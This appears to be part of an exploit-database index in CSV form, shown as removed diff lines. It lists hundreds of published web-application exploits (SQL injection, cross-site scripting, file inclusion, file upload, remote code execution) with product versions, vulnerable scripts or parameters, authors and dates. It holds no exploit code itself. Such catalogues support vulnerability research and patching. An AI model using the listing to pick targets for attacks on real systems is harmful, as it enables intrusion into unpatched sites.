-35574,exploits/php/webapps/35574.txt,"vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",php,webapps, -35575,exploits/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,php,webapps, -35576,exploits/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps, -35577,exploits/php/webapps/35577.txt,"vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps, -35578,exploits/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps, -35579,exploits/php/webapps/35579.txt,"MiniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80 -35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35583,exploits/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35584,exploits/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35585,exploits/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35588,exploits/php/webapps/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,webapps,9000 -35591,exploits/php/webapps/35591.txt,"PHPMyRecipes 1.2.2 - 'browse.php?category' SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 -35593,exploits/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps, -35594,exploits/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 -35596,exploits/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps, -35598,exploits/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure & Demetris Papapetrou",php,webapps, -35599,exploits/asp/webapps/35599.txt,"Dimac CMS 1.3 XS - 'default.asp' SQL Injection",2011-04-11,KedAns-Dz,asp,webapps, -35601,exploits/php/webapps/35601.txt,"Etki Video PRO 2.0 - 'izle.asp?id' SQL Injection",2011-04-11,Kurd-Team,php,webapps, -35602,exploits/php/webapps/35602.txt,"Etki Video PRO 2.0 - 'kategori.asp?cat' SQL Injection",2011-04-11,Kurd-Team,php,webapps, -35603,exploits/php/webapps/35603.txt,"WordPress Theme Live Wire 2.3.1 - Multiple Vulnerabilities",2011-04-11,MustLive,php,webapps, -35604,exploits/php/webapps/35604.txt,"eForum 1.1 - 'eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps, -35605,exploits/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 -35607,exploits/php/webapps/35607.txt,"WordPress Plugin Spellchecker 3.1 - '/general.php' Local/Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps, -35608,exploits/php/webapps/35608.txt,"WordPress Theme The Gazette Edition 2.9.4 - Multiple Vulnerabilities",2011-04-12,MustLive,php,webapps, -35610,exploits/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps, -35611,exploits/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",php,webapps, -35615,exploits/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps, -35616,exploits/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps, -35617,exploits/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Cross-Site Scripting",2011-04-14,d3c0der,php,webapps, -35618,exploits/php/webapps/35618.txt,"RunCMS Module Partners - 'id' SQL Injection",2011-04-15,KedAns-Dz,php,webapps, -35619,exploits/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps, -35621,exploits/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injections",2011-04-16,KedAns-Dz,php,webapps, -35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps, -35624,exploits/php/webapps/35624.txt,"phpList 3.0.6/3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps, -35625,exploits/php/webapps/35625.txt,"PMB 4.1.3 - Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps, -35626,exploits/php/webapps/35626.txt,"Easy File Sharing Web Server 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps, -35629,exploits/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusions",2011-04-16,KedAns-Dz,php,webapps, -35630,exploits/php/webapps/35630.txt,"Joomla! Component com_phocadownload - Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps, -35631,exploits/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps, -35632,exploits/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps, -35633,exploits/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps, -35634,exploits/php/webapps/35634.txt,"WordPress Plugin WP-StarsRateBox 1.1 - 'j' SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps, -35635,exploits/php/webapps/35635.txt,"Dalbum 1.43 - 'editini.php' Cross-Site Scripting",2011-04-19,"High-Tech Bridge SA",php,webapps, -35636,exploits/php/webapps/35636.txt,"ChatLakTurk PHP Botlu Video - 'ara.php' Cross-Site Scripting",2011-04-19,"kurdish hackers team",php,webapps, -35643,exploits/php/webapps/35643.txt,"webSPELL 4.2.2a - Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps, -35659,exploits/php/webapps/35659.txt,"Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting",2014-12-31,"Halil Dalabasmaz",php,webapps,80 -35645,exploits/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Cross-Site Scripting",2011-04-20,Kurd-Team,php,webapps, -35647,exploits/php/webapps/35647.txt,"SyCtel Design - 'menu' Multiple Local File Inclusions",2011-04-21,"Ashiyane Digital Security Team",php,webapps, -35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps, -35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps, -35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",php,webapps, -35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps, -35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps, -35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps, -35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps, -35664,exploits/php/webapps/35664.txt,"phpList 2.10.x - 'email' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps, -35658,exploits/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps, -35663,exploits/php/webapps/35663.txt,"WordPress Plugin WP Ajax Recent Posts 1.0.1 - 'do' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps, -35653,exploits/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,php,webapps, -35665,exploits/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps, -35666,exploits/php/webapps/35666.txt,"Football Website Manager 1.1 - SQL Injection / Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps, -35667,exploits/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,php,webapps, -35668,exploits/php/webapps/35668.txt,"up.time Software 5 - Administration Interface Remote Authentication Bypass",2011-04-27,"James Burton",php,webapps, -35670,exploits/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 -35677,exploits/php/webapps/35677.txt,"eyeOS 1.9.0.2 - Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps, -35678,exploits/php/webapps/35678.txt,"phpGraphy 0.9.13b - 'theme_dir' Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps, -35679,exploits/php/webapps/35679.txt,"e107 2 Bootstrap CMS - Cross-Site Scripting",2015-01-03,"Ahmet Agar / 0x97",php,webapps, -35680,exploits/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,php,webapps, -35682,exploits/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross-Site Scripting",2011-04-30,"AutoSec Tools",php,webapps, -35683,exploits/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross-Site Scripting",2011-05-02,"Patrick Webster",java,webapps, -35684,exploits/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 - 'selfserviceSaveOk' Cross-Site Scripting",2011-05-02,"AutoSec Tools",php,webapps, -35699,exploits/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps, -35700,exploits/php/webapps/35700.txt,"YaPiG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps, -35697,exploits/php/webapps/35697.txt,"Web Auction 0.3.6 - 'lang' Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps, -35698,exploits/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps, -35691,exploits/php/webapps/35691.txt,"Crea8Social 2.0 - Cross-Site Scripting Change Interface",2015-01-04,"Yudhistira B W",php,webapps, -35713,exploits/php/webapps/35713.txt,"FestOS 2.3c - 'upload.php' Arbitrary File Upload",2011-05-08,KedAns-Dz,php,webapps, -35701,exploits/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps, -35702,exploits/php/webapps/35702.txt,"GoT.MY (Multiple Products) - 'theme_dir' Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps, -35704,exploits/php/webapps/35704.txt,"WordPress Plugin WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps, -35705,exploits/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps, -35706,exploits/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps, -35707,exploits/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",jsp,webapps, -35708,exploits/php/webapps/35708.txt,"PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps, -35709,exploits/php/webapps/35709.txt,"e107 0.7.25 - 'news.php' SQL Injection",2011-05-07,KedAns-Dz,php,webapps, -35710,exploits/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80 -35715,exploits/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps, -35716,exploits/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps, -35717,exploits/php/webapps/35717.txt,"Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps, -35718,exploits/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps, -35719,exploits/php/webapps/35719.py,"phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps, -35720,exploits/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 -35721,exploits/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",hardware,webapps,80 -35722,exploits/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 -35723,exploits/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections",2011-05-01,"AutoSec Tools",php,webapps, -35724,exploits/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps, -35726,exploits/php/webapps/35726.py,"Getsimple 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps, -35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps, -35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps, -35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 -35733,exploits/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 -35734,exploits/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,php,webapps, -35736,exploits/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps, -35737,exploits/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections",2011-05-10,"High-Tech Bridge SA",php,webapps, -35739,exploits/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps, -35743,exploits/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps, -35745,exploits/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' SQL Injection",2011-05-16,KedAns-Dz,php,webapps, -35747,exploits/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps, -35758,exploits/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps, -35750,exploits/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps, -35751,exploits/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - 'Lancfg2get.cgi Persistent Cross-Site Scripting",2015-01-11,"XLabs Security",hardware,webapps, -35752,exploits/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injections",2011-05-16,KedAns-Dz,php,webapps, -35754,exploits/php/webapps/35754.txt,"allocPSA 1.7.4 - '/login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps, -35755,exploits/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps, -35756,exploits/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps, -35757,exploits/php/webapps/35757.txt,"eFront 3.6.9 - 'scripts.php' Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps, -35759,exploits/php/webapps/35759.txt,"eFront 3.6.9 - 'submitScore.php' Cross-Site Scripting",2011-05-16,"John Leitch",php,webapps, -35760,exploits/php/webapps/35760.txt,"PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps, -35761,exploits/php/webapps/35761.txt,"TWiki 5.0.1 - 'origurl' Cross-Site Scripting",2011-05-18,"Mesut Timur",php,webapps, -35767,exploits/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80 -35998,exploits/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps, -35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80 -35770,exploits/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan_ Koh",hardware,webapps,623 -35775,exploits/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 -35781,exploits/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps, -35782,exploits/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps, -35783,exploits/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution",2011-05-19,"AutoSec Tools",php,webapps, -35787,exploits/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps, -35788,exploits/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' SQL Injection",2011-05-23,FL0RiX,php,webapps, -35789,exploits/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps, -35791,exploits/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps, -35803,exploits/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,php,webapps, -35796,exploits/php/webapps/35796.txt,"MidiCMS Website Builder - Local File Inclusion / Arbitrary File Upload",2011-05-25,KedAns-Dz,php,webapps, -35797,exploits/php/webapps/35797.txt,"Joomla! Component com_shop - SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps, -35798,exploits/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Cross-Site Scripting",2011-05-25,"AutoSec Tools",php,webapps, -35802,exploits/cgi/webapps/35802.txt,"BlackBoard Learn 8.0 - 'keywordraw' Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps, -35807,exploits/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps, -35808,exploits/php/webapps/35808.txt,"S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps, -35814,exploits/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,php,webapps, -35815,exploits/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps, -35816,exploits/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections",2011-06-01,"High-Tech Bridge SA",php,webapps, -35819,exploits/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps, -35823,exploits/php/webapps/35823.txt,"WordPress Plugin Pie Register 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 -35824,exploits/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps, -35985,exploits/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'report_marketing.php?exc[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps, -35986,exploits/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'billable_incidents.php?sites[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps, -35984,exploits/php/webapps/35984.txt,"Joomla! Component com_virtualmoney 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps, -35826,exploits/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps, -35829,exploits/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps, -35830,exploits/php/webapps/35830.txt,"Multiple WordPress WooThemes Themes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps, -35831,exploits/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps, -35832,exploits/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps, -35833,exploits/php/webapps/35833.txt,"Xataface 1.x - 'action' Local File Inclusion",2011-06-07,ITSecTeam,php,webapps, -35834,exploits/php/webapps/35834.txt,"Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps, -35835,exploits/php/webapps/35835.txt,"WordPress Plugin GD Star Rating - 'votes' SQL Injection",2011-06-08,anonymous,php,webapps, -35837,exploits/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps, -35838,exploits/php/webapps/35838.txt,"Tolinet Agencia - 'id' SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps, -35839,exploits/php/webapps/35839.txt,"Joomla! Component Minitek FAQ Book 1.3 - 'id' SQL Injection",2011-06-13,kaMtiEz,php,webapps, -35840,exploits/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 -35996,exploits/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps, -35846,exploits/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 -35851,exploits/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps, -35852,exploits/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps, -35853,exploits/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps, -35854,exploits/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps, -35857,exploits/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection",2015-01-21,TranDinhTien,php,webapps, -35858,exploits/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps, -35860,exploits/php/webapps/35860.txt,"vBulletin vBSSO Single Sign-On 1.4.14 - SQL Injection",2015-01-20,Technidev,php,webapps,80 -35861,exploits/php/webapps/35861.txt,"vBTube 1.2.9 - 'vBTube.php' Multiple Cross-Site Scripting Vulnerabilities",2011-06-14,Mr.ThieF,php,webapps, -35862,exploits/php/webapps/35862.txt,"miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps, -35863,exploits/php/webapps/35863.php,"MyBloggie 2.1.6 - HTML Injection / SQL Injection",2011-06-15,"Robin Verton",php,webapps, -35865,exploits/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,php,webapps, -35866,exploits/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,php,webapps, -35867,exploits/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps, -35871,exploits/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps, -35872,exploits/asp/webapps/35872.txt,"H3C ER5100 - Authentication Bypass",2011-06-22,128bit,asp,webapps, -35874,exploits/php/webapps/35874.txt,"Eshop Manager - Multiple SQL Injections",2011-06-22,"Number 7",php,webapps, -35875,exploits/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps, -35877,exploits/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps, -35878,exploits/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",php,webapps, -35879,exploits/php/webapps/35879.txt,"WordPress Plugin Cforms 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps, -35882,exploits/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps, -35883,exploits/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' SQL Injection",2011-06-27,Th3.xin0x,php,webapps, -35884,exploits/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps, -35890,exploits/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps, -35891,exploits/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080 -35893,exploits/php/webapps/35893.txt,"WordPress Plugin Pretty Link Lite 1.4.56 - Multiple SQL Injections",2011-06-27,MaKyOtOx,php,webapps, -35894,exploits/php/webapps/35894.txt,"Joomla! 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps, -35896,exploits/php/webapps/35896.txt,"Flatpress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps, -35899,exploits/php/webapps/35899.txt,"Mangallam CMS - SQL Injection",2015-01-26,Vulnerability-Lab,php,webapps, -35900,exploits/cgi/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass",2015-01-26,Vulnerability-Lab,cgi,webapps, -35980,exploits/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery",2015-02-03,"Mohamed Idris",multiple,webapps,8020 -35904,exploits/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 < Build 9031 - User Privileges Management",2015-01-26,"Rewterz - Research Group",jsp,webapps, -35906,exploits/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",php,webapps, -35908,exploits/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,multiple,webapps, -35910,exploits/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps, 